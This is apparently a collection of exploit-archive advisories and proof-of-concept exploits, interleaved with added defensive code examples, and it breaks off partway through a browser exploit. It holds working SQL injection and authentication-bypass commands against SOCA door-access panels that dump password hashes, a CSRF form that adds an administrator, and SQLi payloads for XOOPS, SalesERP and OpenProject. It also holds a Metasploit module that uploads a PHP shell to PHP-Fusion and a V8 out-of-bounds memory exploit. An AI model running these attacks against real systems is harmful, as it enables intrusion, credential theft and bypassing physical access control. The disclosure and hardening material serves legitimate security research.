SOCA Access Control System 180612 SQL Injection And Authentication Bypass


Vendor: SOCA Technology Co., Ltd
Product web page: http://www.socatech.com
Affected version: 180612, 170000 and 141007

Summary: The company's products include proximity and fingerprint access
control system, time and attendance, electric locks, card reader and writer,
keyless entry system and other 30 specialized products. All products are
attractively designed with advanced technology in accordance with users'
safety and convenience which also fitted international standard.

Desc: The Soca web access control system suffers from multiple SQL Injection
vulnerabilities. Input passed via multiple POST parameters is not properly
sanitised before being returned to the user or used in SQL queries. This
can be exploited to manipulate SQL queries by injecting arbitrary SQL code
and to bypass the authentication mechanism. It allows the attacker to remotely
disclose password hashes and log in with the MD5 hash with highest privileges,
resulting in unlocking doors and bypassing the physical access control in place.

Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
           Apache/2.2.22 (Win32)
           PHP/5.4.13
           Firebird/InterBase DBMS


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5519
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php


20.04.2018

--


Authentication bypass / SQL injection via pos_id POST parameter in Login.php:
-----------------------------------------------------------------------------
-version 141007

# curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i \
"http://10.0.0.4/Login/Login.php"

HTTP/1.1 200 OK
Date: Fri, 03 May 2018 13:37:25 GMT
Server: Apache/2.2.22 (Win32) PHP/5.4.13
X-Powered-By: PHP/5.4.13
Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5
Content-Type: text/html

 true


Authentication bypass / SQL injection via ID POST parameter in Login.php:
=========================================================================
-version 180612

# curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng" \
"http://10.0.0.3/Login/Login.php"

{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}


Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php:
=============================================================================

Dump current user:
------------------

# curl -X POST --data "cidx=144 and 1=(user)" \
"http://10.0.0.3/Card/Card_Edit_GetJson.php" \
-H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

Warning:  ibase_fetch_assoc(): conversion error from string "SYSDBA";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

Dump table:
-----------

# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)" \
"http://10.0.0.3/Card/Card_Edit_GetJson.php" \
-H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

Warning:  ibase_fetch_assoc(): conversion error from string "USERS";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

Dump column:
------------

# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))" \
"http://10.0.0.3/Card/Card_Edit_GetJson.php" \
-H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

Warning:  ibase_fetch_assoc(): conversion error from string "U_NAME";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

Dump column:
------------

# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))" \
"http://10.0.0.3/Card/Card_Edit_GetJson.php" \
-H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

Warning:  ibase_fetch_assoc(): conversion error from string "U_PASSWORD";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

Dump username and Idx from USERS table:
---------------------------------------

# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)" \
"http://10.0.0.3/Card/Card_Edit_GetJson.php" \
-H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

Warning:  ibase_fetch_assoc(): conversion error from string "USER1";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

Dump passwords from UAC table:
------------------------------

# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)" \
"http://10.0.0.3/Card/Card_Edit_GetJson.php" \
-H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

Warning:  ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17


Login with MD5:
===============

# curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng" \
"http://10.0.0.3/Login/Login.php"

{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
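
The two server-side flaws this advisory demonstrates (request values concatenated into the login query, and the stored MD5 hash accepted as the credential) beside a corrected check. This is an added example, not code from the advisory or from SOCA: the table layout, account data and function names are constructed, and SQLite stands in for the Firebird database.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed test data; not taken from the advisory.
PASSWORD = "constructed-Passw0rd"
LEAKED_MD5 = hashlib.md5(PASSWORD.encode()).hexdigest()


def derive(password, salt):
    """Salted, deliberately slow password hash (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def make_db():
    """Hypothetical accounts table; SQLite is an assumption standing in for Firebird."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE accounts "
        "(name TEXT PRIMARY KEY, md5_hex TEXT, salt BLOB, kdf BLOB)"
    )
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO accounts VALUES (?, ?, ?, ?)",
        ("USER", LEAKED_MD5, salt, derive(PASSWORD, salt)),
    )
    return db


def login_vulnerable(db, user, pw):
    """Models the behaviour the advisory describes.

    Flaw 1: request values are concatenated into the SQL text.
    Flaw 2: the submitted value is compared with the stored hash itself,
            so a disclosed hash works as the password.
    """
    sql = ("SELECT name FROM accounts WHERE name = '" + user +
           "' AND md5_hex = '" + pw + "'")
    return db.execute(sql).fetchone() is not None


def login_hardened(db, user, pw):
    """Bound parameters, server-side salted hashing, constant-time compare."""
    row = db.execute(
        "SELECT salt, kdf FROM accounts WHERE name = ?", (user,)
    ).fetchone()
    if row is None:
        derive(pw, b"\x00" * 16)  # spend the same work for unknown users
        return False
    salt, stored = row
    return hmac.compare_digest(derive(pw, salt), stored)
```

With the hardened check, the login input quoted in the advisory is treated as a literal user name, and a hash read from the database no longer authenticates because the server hashes whatever is submitted.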
            
SOCA Access Control System 180612 CSRF Add Admin Exploit


Vendor: SOCA Technology Co., Ltd
Product web page: http://www.socatech.com
Affected version: 180612, 170000 and 141007

Summary: The company's products include Proximity and Fingerprint access
control system, Time and Attendance, Electric Locks, Card reader and writer,
keyless entry system and other 30 specialized products. All products are
attractively designed with advanced technology in accordance with users'
safety and convenience which also fitted international standard.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
           Apache/2.2.22 (Win32)
           PHP/5.4.13


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5520
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php


20.04.2018

--


<html>
  <body>
  <script>history.pushState('', 'shpa', '/index-pc.php')</script>
    <form action="http://10.0.0.3/Permission/Insert_Permission.php" method="POST">
      <input type="hidden" name="Permission" value='{"Idx":null,"Id":"Imposter","Password":"123456","Access":"ffffff00ff00ffffff00"}' />
      <input type="submit" value="Forge!" />
    </form>
  </body>
</html>
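
The validity check that the description says is missing, as an added example (not code from the advisory or the vendor): a per-session token plus an origin check applied before any state-changing request such as the one forged above. The field name `csrf_token`, the function names and the session id are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret, never sent to clients
PANEL_ORIGIN = "http://10.0.0.3"      # the panel's own origin, as in the PoC above


def issue_token(session_id):
    """Token the panel embeds in every form it renders for this session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers):
    """True only if the request was sent from a page served by the panel."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # strict: a request with no origin information is refused
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == PANEL_ORIGIN


def allow_state_change(method, headers, session_id, form):
    """Gate for endpoints that create, modify or delete data."""
    if method != "POST" or not same_origin(headers):
        return False
    sent = form.get("csrf_token", "")
    expected = issue_token(session_id)
    return hmac.compare_digest(sent.encode(), expected.encode())
```

A cross-site form cannot read the token from the panel's pages, so the browser submits the victim's session cookie without it and the request is refused.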
            
SOCA Access Control System 180612 Information Disclosure


Vendor: SOCA Technology Co., Ltd
Product web page: http://www.socatech.com
Affected version: 180612, 170000 and 141007

Summary: The company's products include proximity and fingerprint access
control system, time and attendance, electric locks, card reader and writer,
keyless entry system and other 30 specialized products. All products are
attractively designed with advanced technology in accordance with users'
safety and convenience which also fitted international standard.

Desc: Insecure direct object references occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system.

Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
           Apache/2.2.22 (Win32)
           PHP/5.4.13
           Firebird/InterBase DBMS


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5517
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php


20.04.2018

--


Authenticated users password hash disclosure via Get_Permissions_From_DB.php:
-----------------------------------------------------------------------------

# curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

[{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}]


Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard:
------------------------------------------------------------------------

# curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data "Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat

{"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames":
{"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling":
1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444",
"Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[
...
...
...


phpinfo() disclosure:
---------------------

# curl -s http://10.0.0.3/phpinfo.php
            
#Exploit Title: DNSS Domain Name Search Software 2.1.8 -  Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-12
#Vendor Homepage: www.nsauditor.com 
#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
#Tested Version: 2.1.8
#Tested on: Windows 10 Single Language x64 / 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: DNSS_2.1.8.py
#2.- Open DNSS.txt and copy content to clipboard
#3.- Open Dnss
#4.- Select "Register" > "Enter Registration Code..."
#5.- In "Name/Key" paste Clipboard
#6.- Click "Ok"
#7.- Crashed
 
cod = "\x41" * 300
 
f = open('DNSS.txt', 'w')
f.write(cod)
f.close()
            
[+] Sql Injection on XOOPS CMS v.2.5.9

[+] Date: 12/05/2019

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: https://xoops.org/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)

[+] Exploit : 

        http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]

   
[+] EOF
            
===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a modern and responsive small business
# management system. It is developed with PHP and the CodeIgniter framework.
# It is designed and developed with shops, small businesses, companies and
# any type of business in mind. It has accounting, management, invoice, user
# and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : customer_id, product_id
# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL Inject Here]
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern : 1260781%27 oR if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
===========================================================================================
            
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
              title: Unauthenticated SQL Injection vulnerability
            product: OpenProject
 vulnerable version: 5.0.0 - 8.3.1
      fixed version: 8.3.2 & 9.0.0
         CVE number: CVE-2019-11600
             impact: Critical
           homepage: https://www.openproject.org
              found: 2019-04-17
                 by: T. Soo (Office Bangkok)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"OpenProject is the leading open source project management software.
Support your project management process along the entire project
life cycle: From project initiation to closure."

Source: https://www.openproject.org/


Business recommendation:
------------------------
The vendor provides a patch which should be applied immediately.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected by further security issues.


Vulnerability overview/description:
-----------------------------------
An SQL injection vulnerability has been identified in the web "activities API".
An unauthenticated attacker could successfully perform an attack to extract
potentially sensitive information from the database if OpenProject is configured
not to require authentication for API access.


Proof of concept:
-----------------
Requesting the following URL will trigger a time delay as a proof of concept
for exploiting the blind SQL injection:
http://<host>/api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777


Vulnerable / tested versions:
-----------------------------
The vulnerability has been identified in OpenProject version 8.3.1 which
was the most current version at the time of discovery.

According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
Older versions (< 5.0.0) are not vulnerable.


Vendor contact timeline:
------------------------
2019-04-30: Contacting vendor through security@openproject.com
2019-04-30: A patch is published in version 8.3.2
2019-05-06: Vendor publishes further details
2019-05-10: Release of security advisory


Solution:
---------
The vendor provides a patched version 8.3.2 and a security notice with further
information:

https://www.openproject.org/release-notes/openproject-8-3-2
https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


EOF Thanaphon Soo / @2019
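
For installations that were running an affected OpenProject version, web server access logs can be checked for requests shaped like the proof of concept above, where the activity id segment of the path is not a plain integer. This is an added example, not part of the SEC Consult advisory: the log lines are constructed, and the combined log format is an assumption about the front-end web server.

```python
import re
from urllib.parse import unquote

# Combined/common log format: client, identity, user, [time], "request", status, size.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
ACTIVITY_PATH = re.compile(r"^/api/v3/activities/(?P<id>[^/?#]+)")

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2019:10:00:00 +0000] '
    '"GET /api/v3/activities/42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/May/2019:10:00:05 +0000] '
    '"GET /api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))'
    '%20AND%20(7777%3d7777 HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/May/2019:10:00:09 +0000] '
    '"GET /api/v3/work_packages/7 HTTP/1.1" 200 900',
]


def suspicious_activity_requests(lines):
    """Return (client_ip, decoded_path) for activities requests with a non-integer id."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        # Separate the query string first so an encoded '?' stays in the path.
        path = unquote(m.group("target").split("?", 1)[0])
        a = ACTIVITY_PATH.match(path)
        if a and not re.fullmatch(r"[0-9]+", a.group("id")):
            hits.append((m.group("ip"), path))
    return hits
```

A hit shows that a malformed id was requested, not that data was extracted; response times and database logs for the same period are the next things to review.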
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution",
      'Description' => %q(
        This module exploits a command execution vulnerability in PHP-Fusion 9.03.00 and prior versions.
        It is possible to execute commands on the system with ordinary user authority. Admin privileges are not needed.
        There is almost no control in the avatar upload section of the profile edit area,
        only a client-side check working with JavaScript (a simple pre-check).
        If this check is ignored, the desired file can be sent to the server via an intercepting proxy.
        The module opens a Meterpreter session for you by bypassing the controls.
      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
      'References' =>
        [
          ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
          ['URL', 'https://www.php-fusion.co.uk'],
          ['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
        ],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['Automatic', {}]],
      'Privileged' => false,
      'DisclosureDate' => "May 11 2019",
      'DefaultTarget' => 0))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']),
        OptString.new('USERNAME', [true, "Username to authenticate with", '']),
        OptString.new('PASSWORD', [true, "Password to authenticate with", ''])
      ]
    )
  end

  def exec
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "images","avatars", "#{@shell}") # shell url
    })
  end
##
# Login and cookie information gathering
##
  def login(uname, pass, check)
    # 1st request to get fusion_token 
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "home.php")
    })

    cookie = res.get_cookies
    @fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
    # 2nd request to login
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'home.php'),
      'cookie'   => cookie,
      'vars_post' => {
        'fusion_token' => @fustoken,
        'form_id' => 'loginform',
        'user_name' => uname,
        'user_pass' => pass,
        'login' => ''
      }
    )

    cookie = res.get_cookies
    location = res.redirection.to_s
    if res && res.code == 302 && location.include?('login.php?error')
      fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
    else
      return cookie
    end

    return nil
  end
##
# Upload malicious file // payload integration
##
  def upload_shell(cookie, check)

    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie'   => cookie
    })

    ncookie = cookie + " " + res.get_cookies # gathering all cookie information

    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie'   => ncookie
    })

    # fetch some necessary post data informations
    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
    userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
    usermail = res.body.split("user_email' value='")[1].split("' >")[0]

    # data preparation to delete priv avatar
    delete = Rex::MIME::Message.new
    delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
    delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
    delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
    delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
    delete.add_part('1', nil, nil, 'form-data; name="delAvatar"')
    delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
    delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
    delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
    deld = delete.to_s

    res = send_request_cgi({
      'method' => 'POST',    
      'data'  => deld,
      'agent' => 'Mozilla',
      'ctype' => "multipart/form-data; boundary=#{delete.bound}",
      'cookie' => ncookie,
      'uri' => normalize_uri(target_uri.path, "edit_profile.php")     
    })
    # priv avatar deleted.
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie'   => cookie
    })

    ncookie = cookie + " " + res.get_cookies # recheck cookies

    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "edit_profile.php"),
      'cookie'   => ncookie
    })

    # They changed. fetch again...
    fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
    userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
    userhash = res.body.split("userhash' value='")[1].split("' style")[0]
    usermail = res.body.split("user_email' value='")[1].split("' >")[0]
    # The "php" string must be removed for bypass.We can use "<?"
    pay = payload.encoded.split("/**/")[1]
    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
    @shell = "#{fname}"
    # data preparation to upload new avatar
    pdata = Rex::MIME::Message.new
    pdata.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
    pdata.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
    pdata.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
    pdata.add_part('1', nil, nil, 'form-data; name="delAvatar"')
    pdata.add_part("<?" + pay, 'image/png', nil, "form-data; name=\"user_avatar\"; filename=\"#{fname}\"")
    pdata.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
    pdata.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
    pdata.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
    data = pdata.to_s

    res = send_request_cgi({
      'method' => 'POST',    
      'data'  => data,
      'agent' => 'Mozilla',
      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
      'cookie' => ncookie,
      'uri' => normalize_uri(target_uri.path, "edit_profile.php")     
    })

    location = res.redirection.to_s
    if res && res.code == 302 && location.include?('error')
      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
    else
      print_status("Trying to upload #{fname}")
      return true
    end
   
  end
##
# Exploit controls and information
##
  def exploit
    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
      
    if upload_shell(cookie, true)
      print_good("Control was bypassed. Harmful file upload successfully!")
      exec
    end
  end
##
# The end of the adventure (o_O) // AkkuS
##
end
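
The module above works because the avatar upload is checked only in the browser. A server-side check of the kind that closes this gap is shown here as an added example (not PHP-Fusion's code and not the referenced fix commit): the function name, the size limit and the allowed types are assumptions. The client-supplied file name and Content-Type are treated as untrusted, and the stored name is generated by the server.

```python
import os
import secrets

# Leading bytes of the image types an avatar may have (assumed allowlist).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
MAX_BYTES = 512 * 1024  # assumed upper bound for an avatar


def accept_avatar(client_filename, client_content_type, data):
    """Return (True, stored_name) or (False, reason).

    client_content_type is taken as a parameter only to make explicit that it
    is never consulted: the client chooses it, as the module above shows.
    """
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in MAGIC:
        return False, "extension not allowed"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match " + ext
    # Never reuse the client's name: no path components, no double extensions.
    return True, secrets.token_hex(16) + ext
```

The upload directory should also be served with script execution disabled, so that a file passing these checks is only ever delivered as static content.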
            
<!--
Since commit https://chromium.googlesource.com/v8/v8.git/+/c22bb466d8934685d897708119543d099b9d2a9a turbofan supports inlining calls to array.includes and array.indexOf. The logic of the function is roughly:

1. Check the set of possible Maps of the array type (with NodeProperties::InferReceiverMaps).
2. If they are all fast arrays, find the correct CSA builtin to handle the fast path (`Callable const callable = search_variant == SearchVariant::kIndexOf ? GetCallableForArrayIndexOf(kind, isolate()) : GetCallableForArrayIncludes(kind, isolate());`).
3. Load the array length and call the builtin. The builtin will assume that the array is a FastArray with packed (dense) elements and directly search linearly through the backing memory.

The issue here is that NodeProperties::InferReceiverMaps doesn't necessarily guarantee that the object will always have the inferred Map. In case it can't prove that the objects will always have the inferred Maps it will return kUnreliableReceiverMaps:

    // Walks up the {effect} chain to find a witness that provides map
    // information about the {receiver}. Can look through potentially
    // side effecting nodes.
    enum InferReceiverMapsResult {
      kNoReceiverMaps,         // No receiver maps inferred.
      kReliableReceiverMaps,   // Receiver maps can be trusted.
      kUnreliableReceiverMaps  // Receiver maps might have changed (side-effect),
                                                  // but instance type is reliable.
    };
    static InferReceiverMapsResult InferReceiverMaps(
        JSHeapBroker* broker, Node* receiver, Node* effect,
        ZoneHandleSet<Map>* maps_return);

In which case the caller is responsible for guarding any optimizations based on the inferred Maps (e.g. by adding MapChecks). However, in this case the calling function fails to do so. As such, if the array is changed to dictionary mode before the inlined function call, the CSA builtin will read data out-of-bounds.

The following sample, found through fuzzing, triggers this case: 

    function v7(v8,v11) {
        function v14(v15,v16) { }
        // Transition to dictionary mode in the final invocation.
        const v17 = v11.__defineSetter__(v8, v14);
        // Will then read OOB.
        const v18 = v11.includes(1234);
        return v18;
    }
    v7([], []);
    v7([], []);
    %OptimizeFunctionOnNextCall(v7);
    v7([], []);

    const v57 = v7(String(0x1000000), []);

Note: the commit introducing this vulnerability does not appear to be included in the stable Chrome release yet.
-->

<script>
var conv_ab = new ArrayBuffer(8);
var conv_f64 = new Float64Array(conv_ab);
var conv_u64 = new BigUint64Array(conv_ab);
BigInt.prototype.to_float = function() {
  conv_u64[0] = this;
  return conv_f64[0];
};
BigInt.prototype.hex = function() {
  return '0x'+this.toString(16);
};
Number.prototype.to_int = function() {
  conv_f64[0] = this;
  return conv_u64[0];
}
Number.prototype.hex = function() {
  return this.to_int().hex();
}

let ab = undefined;

function leak(i, smi_arr, float_arr) {
  let high_bytes = 0;
  smi_arr.__defineSetter__(i, ()=>{});
  ab = new ArrayBuffer(2<<26);
  let smi_boundary = [1, 1, 1, 1];
  for (high_bytes = 0; high_bytes < 0xffff; high_bytes++) {
    smi_boundary[0] = high_bytes;
    let idx = smi_arr.indexOf(high_bytes, 20);
    if (idx == 20) {
      break;
    }
  }

  float_arr.__defineSetter__(i, ()=>{});
  let tmp = new Uint32Array(ab);
  let float_boundary = [1.1, 1.1, 1.1, 1.1];

